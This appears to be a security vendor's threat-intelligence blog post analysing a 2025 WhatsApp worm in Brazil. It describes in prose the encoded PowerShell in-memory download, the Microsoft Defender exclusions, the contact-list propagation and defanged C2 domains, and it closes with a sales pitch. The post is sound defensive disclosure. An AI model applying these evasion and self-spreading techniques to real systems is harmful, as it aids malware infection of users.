On September 30 and October 1, detections and reports indicated massive message deliveries to multiple WhatsApp users in Brazil. The messages prompted recipients to open, via WhatsApp Web or the desktop application, an attached ZIP file. Initially, information about the incidents was limited, with only a few indicators linked to two main domains: zapgrande[.]com and sorvetenopote[.]com.
As evidence accumulated, we identified behavior consistent with a worm. Once the victim was infected, the mechanism leveraged the contact list in the application to resend the same message and attachment to additional users. This propagation pattern enabled rapid dissemination within the first 24 hours of the event.
Upon infection, clicking the attachment triggered the execution of an encoded PowerShell command responsible for downloading and running code in memory — a fileless technique. All activity originated from infrastructure hosted on one of the associated domains.
In parallel, another detected PowerShell command attempted to create exclusions in the host’s protection mechanism (Microsoft Defender). The procedure involved adding a process to the antivirus exclusion list, indicating a deliberate attempt to reduce local defense visibility.
The iT.eam CTI Team’s Response to the WhatsApp Attacks
Following the first detections, iT.eam’s Cyber Threat Intelligence (CTI) team immediately initiated preventive procedures:
- Creation and deployment of rules in the SIEM and security tools to capture known IOCs
- Blocking of malicious domains and URLs
- Continuous pivoting to identify additional domains and infrastructure connected to the attackers
This effort enriched our rule sets and reference lists, expanding detection coverage and enabling more robust correlation capabilities.
Technical Behavior Analysis
During malicious execution, a BAT file was created in the user’s startup folder, with no apparent persistent modifications to system registry keys. Alongside this BAT file, multiple JavaScript scripts were added, acting as follows within the context of WhatsApp Web:
- The malware checked for active sessions
- It repeatedly sent the attached file to contacts in the active session
- It maintained regular communication with the domain zapgrande[.]com
This domain operated as a command-and-control (C2) server, as evidenced by captured traffic during network analysis.
Despite its broad propagation, the worm’s behavior proved relatively simple from a technical standpoint — reinforcing a critical point: social engineering and user curiosity remain decisive infection vectors. Even low-sophistication malware can cause significant impact when anchored in real contact lists and well-targeted social engineering campaigns.
Tactis, Techniques, and Procedures (TTPs) Identified in the WhatsApp Attacks
Below are some of the TTPs associated with this threat:
- Initial Acess: TA0001
Phishing: T1566 - Execution: TA0002
Command and Scripting Interpreter: PowerShell: T1059.001 - Defense Evasion: TA0005
Obfuscated Files or Information: Command Obfuscation: T1027 - Command and Control (C2): TA0011
The Importance of a Mature CTI Team
It is common to assume that campaigns of this nature begin with random number searches. However, the investigation conducted by iT.eam’s CTI team revealed a more sophisticated and opportunistic pattern.
Throughout September 2025, there was a significant increase in the availability and exposure of Brazilian customer databases. Free samples containing between 1,000 and 5,000 records were frequently shared in forums and online groups.
Many of these data breaches were directly or indirectly linked to actors operating in Russian-language forums, both on the clearnet and in more restricted environments such as the dark web and Telegram channels. From these datasets, malicious actors can extract phone numbers, email addresses, and other valuable metadata for targeted campaigns — facilitating the success of phishing schemes and self-propagating worms.
The investigation into this incident clearly demonstrates the strategic importance of having a mature and integrated Cyber Threat Intelligence. CTI goes beyond collecting IOCs — it transforms scattered indicators into actionable intelligence, enables smarter response prioritization, and significantly reduces the time between detection and containment. In the specific case of the WhatsApp attacks that began on September 30, 2025, the integrated efforts of collection, analysis, and dissemination of intelligence were crucial to mitigating the overall impact.
Want to protect your organization from attacks like those that targeted WhatsApp? Contact our specialists to learn more about the work carried out by iT.eam’s CTI team!
